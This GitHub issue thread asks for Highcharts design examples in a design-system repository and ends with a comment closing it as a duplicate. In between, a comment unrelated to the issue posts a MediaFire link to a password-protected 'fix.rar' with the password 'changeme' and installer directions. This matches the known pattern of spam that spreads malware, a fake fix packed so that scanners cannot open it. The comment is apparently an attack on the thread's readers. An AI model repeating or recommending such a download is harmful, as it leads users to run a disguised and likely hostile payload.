### ISSUE TITLE
Chart Theme: create High Charts design examples

### ISSUE THREAD

**Issue by dplsek** [jpmorganchase/salt-ds#4037]
### Area

UI Components

### The problem

Consumers need High Chart examples to reference in code and Figma for their designs.

### The solution

Create High Chart design examples in code and Figma for reference.

### Alternatives and examples

TBD

### Are you a JPMorgan Chase & Co. employee?

- [x] I am an employee of JPMorgan Chase & Co.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by joshwooding** [comment]
Duplicate of #4036
